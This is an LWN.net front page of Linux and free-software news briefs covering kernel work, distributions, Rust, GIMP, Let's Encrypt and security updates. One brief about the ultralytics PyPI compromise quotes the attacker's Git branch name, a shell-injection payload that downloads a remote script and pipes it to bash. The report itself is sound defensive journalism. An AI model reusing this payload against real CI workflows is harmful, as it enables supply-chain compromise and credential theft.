
Welcome to LWN.net

LWN.net is a reader-supported news site dedicated to producing the best coverage from within the Linux and free software development communities. See the LWN FAQ for more information, and please consider subscribing to gain full access and support our activities.

[$] Freezing out the page reference count

[Kernel] Posted Dec 6, 2024 15:55 UTC (Fri) by corbet

The page structure sits at the core of the kernel's memory-management subsystem (for now), and a key part of that structure is its reference count, stored in refcount. The page reference count tells the kernel how many users a given page has and when it can be freed. That count is not needed for every page in the system, though. Matthew Wilcox has recently resurrected an old patch set that expands the concept of a "frozen" page — one that lacks a meaningful reference count — to the immediate benefit of the slab allocator but in the service of a longer-term goal as well.

Full Story (comments: 3)

[$] Debian opens a can of username worms

[Distributions] Posted Dec 5, 2024 16:00 UTC (Thu) by jzb

It has long been said that naming things is one of the hard things to do in computer science. That may be so, but it pales in comparison to the challenge of handling usernames properly in applications. This is especially true when multiple applications are involved, and they are all supposed to agree on what characters are, and are not, allowed. The Debian project is facing that problem right now, as two user-creation utilities disagreed about which names are allowable. A plan is in place to sort this out before the release of Debian 13 ("trixie") sometime next year.

Full Story (comments: 46)

[$] LWN.net Weekly Edition for December 5, 2024

Posted Dec 5, 2024 0:34 UTC (Thu)

The LWN.net Weekly Edition for December 5, 2024 is available.

Inside this week's LWN.net Weekly Edition

  • Front: Rust in Git; Arch PKGBUILDs; Command-line commotion; 6.13 Merge window; RWF_UNCACHED; Incremental Rust compilation; GIMP 3.0.
  • Briefs: Kernel CoC; ARM32 security; Elementary OS 8; Nixos 24.11; Firefox 133.0; Hurl 6.0.0; PHP 8.4.1; Rust 1.83.0; Giving thanks; Quotes; ...
  • Announcements: Newsletters, conferences, security updates, patches, and more.

[$] The return of RWF_UNCACHED

[Kernel] Posted Dec 4, 2024 15:48 UTC (Wed) by corbet

Linux offers two broad ways of performing I/O to files. Buffered I/O, which is the usual way of accessing a file, stores a copy of the transferred data in the kernel's page cache to speed future accesses. Direct I/O, instead, moves data directly between the storage device and a user-space buffer, avoiding the page cache. Both modes have their advantages and disadvantages. In 2019, Jens Axboe proposed an uncached buffered mode to get some of the advantages of both, but that effort stalled at the time. Now, uncached buffered I/O is back with some impressive performance results behind it.

Full Story (comments: 23)

[$] Rust's incremental compiler architecture

[Development] Posted Dec 3, 2024 19:29 UTC (Tue) by daroc

The traditional structure of a compiler forms a pipeline — parsing, type-checking, optimization, and code-generation, usually in that order. But modern programming languages have requirements that are ill-suited to such a design. Increasingly, compilers are moving toward other designs in order to support incremental compilation and low-latency responses for uses like integration into IDEs. Rust has, for the last eight years, been pursuing a particularly unusual design; in that time compile times have substantially improved, but there's still more work to be done.

Full Story (comments: 15)

[$] The rest of the 6.13 merge window

[Kernel] Posted Dec 2, 2024 14:51 UTC (Mon) by corbet

The 6.13 merge window closed with the release of 6.13-rc1 on December 1. By that time, 11,307 non-merge commits had been pulled into the mainline repository; about 9,500 of those landed after our first-half merge-window summary was written. There was a lot of new material in these patches, including architecture-support improvements, new BPF features, an efficient way to add guard pages to an address space, more Rust support, a vast number of new device drivers, and more.

Full Story (comments: 8)

[$] GIMP 3.0 — a milestone for open-source image editing

[Development] Posted Nov 28, 2024 14:52 UTC (Thu) by rolandixor

The long-awaited release of the GNU Image Manipulation Program (GIMP) 3.0 is on the way, marking the first major update since version 2.10 was released in April 2018. It now features a GTK 3 user interface and GIMP 3.0 introduces significant changes to the core platform and plugins. This release also brings performance and usability improvements, as well as more compatibility with Wayland and complex input sources.

Full Story (comments: 30)

[$] The kernel's command-line commotion

[Kernel] Posted Nov 27, 2024 14:43 UTC (Wed) by corbet

For the most part, the 6.13 merge window has gone smoothly, with relatively few problems or disagreements — other than this one, of course. There is one other exception, though, relating to the kernel's presentation of a process's command line to interested user-space observers when a relatively new system call is used. A pull request with a simple change to make that information more user-friendly ran afoul of Linus Torvalds, who has his own view of how it should be managed.

Full Story (comments: 60)

[$] Arch Linux finally starts licensing PKGBUILDs

[Distributions] Posted Nov 26, 2024 16:40 UTC (Tue) by jzb

Arch Linux is popular as a base for other Linux distributions; examples of Arch-derivatives include EndeavourOS, Manjaro, Parabola, and SteamOS. There's one small problem: the control files used to describe how to build packages for Arch Linux have no stated license. That creates a bit of uncertainty about the rights and responsibilities for the downstream derivatives. So far, that doesn't seem to have been a problem, nor has it stopped other projects from assuming that reuse is allowed. However, the Arch project is looking to add some clarity by explicitly assigning a liberal license to its package sources. Currently the project is in the process of reaching out to contributors to see if they have any objections.

Full Story (comments: 52)

[$] NonStop discussion around adding Rust to Git

[Development] Posted Nov 22, 2024 15:13 UTC (Fri) by daroc

The Linux kernel community's discussions about including Rust have gotten a lot of attention, but the kernel is not the only project wrestling with the question of whether to allow Rust. The Git project discussed the prospect in January, and then again at the Git Contributor's Summit in September. Complicating the discussion is the Git project's lack of a policy on platform support, and the fact that it does already have tools written in other languages. While the project has not committed to using or avoiding Rust, it seems like only a matter of time until maintainers will have to make a decision.

Full Story (comments: 202)

Abusing Git branch names to compromise a PyPI package

[Security] Posted Dec 6, 2024 18:44 UTC (Fri) by daroc

A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the pull_request_target GitHub Action trigger to automate some of its continuous integration tasks. This runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell injection attack from the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI to include a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already pulled the malicious script.

This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.

Comments (35 posted)

A single stable kernel to fix boot problems

[Kernel] Posted Dec 6, 2024 15:58 UTC (Fri) by daroc

Greg Kroah-Hartman released version 6.12.3 of the kernel to fix a regression that can cause some machines to fail to boot on version 6.12.2. The other stable branches are continuing on their normal cadence, with 6.12.4-rc1 and 6.6.64-rc1 starting review today.

Comments (none posted)

Security updates for Friday

[Security] Posted Dec 6, 2024 14:26 UTC (Fri) by daroc

Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).

Full Story (comments: none)

Apertis v2024 released

[Distributions] Posted Dec 5, 2024 23:38 UTC (Thu) by corbet

Apertis is a Collabora-developed Debian derivative distribution designed to be incorporated into electronic devices; the v2024 release is now available. It is now based on the Bookworm release, and includes support for Podman, ONNX Runtime, OP-TEE, and more.

Apertis relies on the Debian Free Software Guidelines to ensure all software shipped is open source or, in limited cases, at least freely distributable. However, for some customers this is not enough to be able to adopt OSS solutions as in their evaluations some provisions in common licenses like the GPL-3 are at odds with regulatory constraints they are subject to. Apertis does not set to solve this decades-long debate, and instead its goal is to increase the adoption of modern, maintained OSS solutions in markets where this has historically been a challenge. To enable this, Apertis supports avoiding the use of any software under some licenses (like the GPL v3.0 license family) on target images, while still making them fully available for development and for customers that do not share those licensing concerns. To avoid these licenses, Apertis uses more modern alternatives instead of relying on outdated and unmaintained pre-GPL-3 versions. For instance, coreutils and findutils (GPL-3+) are replaced in Apertis by rust-coreutils and rust-findutils.

Comments (21 posted)

Let's Encrypt sets date for ending OCSP support

[Security] Posted Dec 5, 2024 19:22 UTC (Thu) by jzb

In July, Let's Encrypt announced it was ending support "as soon as possible" for the Online Certificate Status Protocol (OCSP) in favor of Certificate Revocation Lists (CRLs) due to privacy concerns. The organization has now announced that it has set a timeline, and will be turning off its OCSP responders on August 6, 2025. There is additional action required for Let's Encrypt users who use the OCSP Must Staple Extension:

As of January 30, 2025, issuance requests that include the OCSP Must Staple extension will fail, unless the requesting account has previously issued a certificate containing the OCSP Must Staple extension.

As of May 7, all issuance requests that include the OCSP Must Staple extension will fail, including renewals. Please change your ACME client configuration to not request the extension.

Comments (29 posted)

‘Tis the Season for COSMIC Alpha 4! (System76 Blog)

[Distributions] Posted Dec 5, 2024 16:59 UTC (Thu) by jzb

System76 has announced the fourth alpha release of its Rust-based COSMIC desktop. New features in this version include the ability to set default applications, region and language settings, a new Accessibility applet, as well as support for variable refresh rate (VRR) in the cosmic-comp compositor and the display settings tool. See the blog post for a full list of fixes and performance improvements. LWN covered the first alpha release in August.

Comments (9 posted)

Mozilla's new branding strategy

[Briefs] Posted Dec 5, 2024 15:15 UTC (Thu) by corbet

Mozilla would appear to have concluded that the solution to its problems is an extensive rebranding effort:

We teamed up with global branding powerhouse Jones Knowles Ritchie (JKR) to revamp our brand and revitalize our intentions across our entire ecosystem. At the heart of this transformation is making sure people know Mozilla for its broader impact, as well as Firefox. Our new brand strategy and expression embody our role as a leader in digital rights and innovation, putting people over profits through privacy-preserving products, open-source developer tools, and community-building efforts.

Comments (22 posted)

Stable kernels 6.12.2, 6.11.11, and 4.19.325

[Kernel] Posted Dec 5, 2024 14:20 UTC (Thu) by jake

Greg Kroah-Hartman has released the 6.12.2, 6.11.11, and 4.19.325 stable kernels. Note that both 6.11.11 and 4.19.325 are the last kernels in those series, "please move off to a newer kernel version". In the 4.19.325 release notice, he has a rather longer-than-usual message, including:

As a "fun" proof that this one is finished (and that any company saying they care about it really should have their statements validated with facts), I looked at the "unfixed" CVEs from this kernel release. Currently it is a list 983 CVEs long, too long to list here.

You can verify it yourself by cloning the vulns.git repo at git.kernel.org and running:

	./scripts/strak v4.19.325

Note, this does NOT count the hardware CVEs which kernel.org does not track, and many are still unfixed in this kernel branch.

Comments (17 posted)

Security updates for Thursday

[Security] Posted Dec 5, 2024 14:08 UTC (Thu) by jake

Security updates have been issued by Fedora (thunderbird, tuned, and webkitgtk), Mageia (python-aiohttp and qemu), Oracle (container-tools:ol8, firefox, java-1.8.0-openjdk, java-11-openjdk, kernel, kernel:4.18.0, krb5, pam, postgresql:16, python-tornado, python3:3.6.8, thunderbird, tigervnc, tuned, and webkit2gtk3), Red Hat (bzip2, postgresql, postgresql:13, postgresql:15, postgresql:16, python-tornado, and ruby:3.1), Slackware (python3), SUSE (postgresql, postgresql16, postgresql17, postgresql13, postgresql14, postgresql15, python-python-multipart, and python3), and Ubuntu (python-django and recutils).

Full Story (comments: none)

Fedora moves towards Forgejo (Fedora Magazine)

[Distributions] Posted Dec 4, 2024 17:31 UTC (Wed) by jzb

Fedora Project Leader Matthew Miller reports that the project's search to replace Pagure as its git forge is almost complete, with the Fedora Council strongly in favor of Forgejo:

The Council, currently, has a clear preference for Forgejo. This is a big decision and we don't want it to feel rushed. Therefore, we're opening this up one last time to everyone's comments. After two weeks, we'll take our formal vote — and then get on with the work!

LWN looked at Forgejo in February.

Comments (7 posted)



Copyright © 2024, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds